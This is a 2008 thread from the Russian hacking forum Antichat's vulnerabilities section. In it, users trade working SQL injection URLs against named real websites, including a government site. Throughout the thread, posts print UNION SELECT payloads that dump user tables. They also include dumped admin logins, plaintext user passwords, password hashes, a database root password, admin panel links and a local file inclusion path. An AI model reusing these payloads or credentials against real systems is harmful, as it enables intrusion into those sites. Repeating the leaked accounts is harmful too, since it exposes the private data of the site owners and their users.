ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5591  
Старый 02.06.2008, 01:11
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223

Репутация: 5
По умолчанию

http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login ,user_pass,user_email,user_url,user_status,user_ni cename)+using+latin1),3,4,5,6,7,8+from+wp_users+li mit+0,1/*
version()=5.0.15
login = admin
pass = saddam
Кто сможет найти админку, дайте ссылку!!)))
 
Ответить с цитированием

  #5592  
Старый 02.06.2008, 01:29
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
Сообщение от На100ящий  
http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user_login ,user_pass,user_email,user_url,user_status,user_ni cename)+using+latin1),3,4,5,6,7,8+from+wp_users+li mit+0,1/*
version()=5.0.15
login = admin
pass = saddam
Кто сможет найти админку, дайте ссылку!!)))
http://axe.dp.ua/adm/
С первого раза
 
Ответить с цитированием

  #5593  
Старый 02.06.2008, 04:40
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

http://www.funnybusiness.ca/news.php?id=-3+UNION+SELECT+1,concat_ws(0x3a,client,password,na me),3,4,5,6+from+login_client/*
http://www.cagayandeoro.gov.ph/index.php?page=news&id=-1+union+select+1,2,concat_ws(0x3a,account_username ,account_password),4,5,6,7,8,9+from+tbl_account/*

Последний раз редактировалось Isis; 02.06.2008 в 15:01..
 
Ответить с цитированием

  #5594  
Старый 02.06.2008, 05:04
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

На100ящий, S00pY
в админку не заходит с твоим пасом. может из другой базы?

Вот еще базы:
Цитата:
http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,user,pass, email)+using+latin1),3,4,5,6,7,8+from+test_190.use rs+where+privilege=1/*
Цитата:
http://www.axe.dp.ua/view.php?fid=-1+union+select+1,convert(concat_ws(0x3a,us_group_i d,us_login,us_password)+using+latin1),3,4,5,6,7,8+ from+test_267.users/*

Последний раз редактировалось sabe; 02.06.2008 в 05:08..
 
Ответить с цитированием

  #5595  
Старый 02.06.2008, 15:06
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

http://www.periodontology.gr
база
Цитата:
$host="localhost";
$user="root";
$pass="sqlr@m@";
$Name="1to1db";
PS если не сюда запостил удалите плз

Последний раз редактировалось .Striker; 02.06.2008 в 15:09..
 
Ответить с цитированием

  #5596  
Старый 02.06.2008, 15:32
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

http://old.rusmet.ru/production.php?act=comp&comp_id=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion())/*&data_type=1&page=2
Версия:4.1.22
Пользователь:rusmet@localhost
База:rusmet_comp

http://www.metall.dn.ua/answer.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2/*
Версия:4.1.22
Пользователь:metalpor_metalpo@localhos
База:metalpor_clients

Последний раз редактировалось [aywo]; 02.06.2008 в 16:38..
 
Ответить с цитированием

  #5597  
Старый 02.06.2008, 15:54
XTZ
Новичок
Регистрация: 29.09.2007
Сообщений: 1
Провел на форуме:
46683

Репутация: 0
По умолчанию

http://alesya.by/interview.php?act=intview&int=-24+union+select+1,2,3,4,5/*

USER(): u93086@10.10.153.161
DATABASE(): u93086_alesa
VERSION(): 5.0.45-log
 
Ответить с цитированием

  #5598  
Старый 02.06.2008, 16:16
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.shoesandblues.com

Цитата:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password) ,4,5,6,7,8+from+users/*
badlaura:cheney
becc:brian
janee:johnny
zoe:taylor

Цитата:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password ,0x3a,id),4,5,6,7,8+from+blog/*
админки не нашёл (
 
Ответить с цитированием

  #5599  
Старый 02.06.2008, 16:28
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию

Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru
 
Ответить с цитированием

  #5600  
Старый 02.06.2008, 16:35
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,password+from+_manager/*
version():5.0.45-log
pass:a86aea5517a58dd5674aa8dd89337e03
Ps:Есть также табла "users"
Цитата:
http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,name,email,add ress,phone,rank)+from+users+limit+1,1/*
Цитата:
http://www.btl.ru/admin/
Pss:_http://www.btl.ru/interview-details.php?id=-1+union+select+1,2,login,password+from+passwords+l imit+0,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ